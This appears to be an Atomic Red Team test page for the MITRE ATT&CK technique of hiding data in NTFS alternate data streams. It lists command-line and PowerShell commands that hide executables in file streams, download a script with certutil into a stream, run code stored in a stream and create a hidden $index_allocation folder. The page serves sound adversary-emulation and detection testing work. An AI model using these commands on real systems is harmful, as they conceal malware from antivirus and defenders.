T1564.004 - Hide Artifacts: NTFS File Attributes

Description from ATT&CK

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)

Atomic Tests

Atomic Test #1 - Alternate Data Streams (ADS)

Execute from Alternate Streams

Reference - 1

Reference - 2

Supported Platforms: Windows

auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4


| Name | Description | Type | Default Value | |——|————-|——|—————| | path | Path of ADS file | path | c:\ADS\|

Attack Commands: Run with
! Elevation Required (e.g. root or admin)

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\temp:ttt
makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o

Atomic Test #2 - Store file in Alternate Data Stream (ADS)

Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test

Supported Platforms: Windows

auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02


| Name | Description | Type | Default Value | |——|————-|——|—————| | payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe| | ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini| | ads_name | Name of ADS | string | desktop.ini|

Attack Commands: Run with

if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
    New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""

Cleanup Commands:

Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore

Atomic Test #3 - Create ADS command prompt

Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run “dir /a-d /s /r | find “:$DATA”” in the %temp% folder to view that the alternate data stream exists. To view the data in the alternate data stream, run “notepad T1564.004_has_ads.txt:adstest.txt”

Supported Platforms: Windows

auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb


| Name | Description | Type | Default Value | |——|————-|——|—————| | file_name | File name of file to create ADS on. | string | %temp%\T1564.004_has_ads_cmd.txt| | ads_filename | Name of ADS. | string | adstest.txt|

Attack Commands: Run with

echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i

Cleanup Commands:

del #{file_name} >nul 2>&1

Atomic Test #4 - Create ADS PowerShell

Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command “ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ‘:$Data’ | Select-Object pschildname” in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run “notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt” in the %temp% folder.

Supported Platforms: Windows

auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1


| Name | Description | Type | Default Value | |——|————-|——|—————| | file_name | File name of file to create ADS on. | string | $env:TEMP\T1564.004_has_ads_powershell.txt| | ads_filename | Name of ADS file. | string | adstest.txt|

Attack Commands: Run with

echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"

Cleanup Commands:

Remove-Item -Path #{file_name} -ErrorAction Ignore

Dependencies: Run with

Description: The file must exist on disk at specified location (#{file_name})
Check Prereq Commands:
if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
Get Prereq Commands:
New-Item -Path #{file_name} | Out-Null

Atomic Test #5 - Create Hidden Directory via $index_allocation

Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution, run “dir /A /Q /R” in the %temp% folder to view that the alternate data stream folder exists. To view the data in the
alternate data stream, run “type %temp%...$…….::$index_allocation\secrets.txt”

Supported Platforms: Windows

auto_generated_guid: 3e6791e7-232c-481c-a680-a52f86b83fdf


| Name | Description | Type | Default Value | |——|————-|——|—————| | folder_name | File name of file to create inside the folder. | string | %temp%\…$…….::$index_allocation| | hidden_filename | Name of the files containing the hidden information | string | secrets.txt|

Attack Commands: Run with

md #{folder_name}
echo too many secrets > #{folder_name}\#{hidden_filename}

Cleanup Commands:

rmdir /S /Q #{folder_name} >nul 2>&1